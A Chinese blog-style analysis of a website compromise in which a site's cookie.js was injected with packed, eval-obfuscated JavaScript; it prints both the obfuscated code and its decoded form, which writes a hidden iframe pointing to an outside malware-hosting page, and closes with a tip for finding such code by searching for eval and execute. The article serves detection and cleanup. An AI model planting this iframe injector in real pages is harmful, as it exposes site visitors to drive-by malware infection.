pc软件 文章资讯 手机软件

您当前的位置→图文中心安全防范JS文件挂马代码分析
阅读排行

JS文件挂马代码分析


2009/8/10  编辑:佚名 来源:转载

这几天, 朋友的顽皮屋商城被挂马, 进入网站的时候, 卡巴斯基提示xxxx\cookie.js被挂iframe, 并且报iframe目的页有马。

打开cookie.js文件后, 发现其中多了如下代码:

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4 a=3.7;4 9=a.x("6");w(9!=-1){}v{4 2=u t();2.s(2.r()+q*8*8*p);3.7="6=o;2="+2.n();3.m("<5 l=k://j.i.h/g/f.e d=c b=0></5>")}',34,34,'||expires|document|var|iframe|cookiesleep|cookie|60|start|cookieString|height|10|width|asp|as|include|org|3322|360safes|http|src|write|toGMTString|test|1000|12|getTime|setTime|Date|new|else|if|indexOf'.split('|'),0,{}));

我想, 如果单单看这个代码的话, 很难发现JS文件是被挂了iframe。 现在挂马手段越来越高明, 挂的代码都是经过算法加密的。 让大家不能简单的找出挂马。 估计这样写, 也是为了逃避服务器上安装的一些木马防火墙吧。 不知道有没有人服务器上装过木马防火墙, 可以拿这个代码试一下, 是否能躲避过木马防火墙。

以上加密后的代码最终运行的代码为:

var cookieString=document.cookie;var start=cookieString.indexOf("cookiesleep");if(start!=-1){}else{var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie="cookiesleep=test;expires="+expires.toGMTString();document.write("<iframe src=http://360safes.3322.org/include/as.asp width=10 height=0></iframe>")}。

这里教大家一个简单的搜索这种马的方法:用editplus中的文件夹搜索, 搜索所有js文件, 搜索关键字为:eval和execute, 然后一个个去看, 一般都能找出这种JS木马的。

相关文章

ASP 、PHP、JSP三者都是面向Web服务器的技术,客户端浏览器不需要任何附加的软件支持。...:ASP(ActiveServerPages),JSP(JavaServerPages),PHP(HypertextPreprocessor)是网站后台建设常见的三种语言,在通过HTML完成了网站的前台页面设计之后,下一步便是通过这三种语言中...。

IIS7.5中对所有请求响应的JSON数据进行GZIP编码:当你有一个RESTful的webservice,并且请求返回的数据格式为JSON格式,你可能希望无论客户端请求头中是否包含Accept-Encoding:gzip,都希望对数据进行gzip/compressed处理,只需对mimetypel...。

js图片等比例缩放:该函数考虑的比较周全functionAutoResizeImage(maxWidth,maxHeight,objImg){varimg=newImage();img.src=objImg.src;varhRatio;varwRatio;va...。

发表评论
网站帮助 - 广告合作 - 下载声明 - 网站地图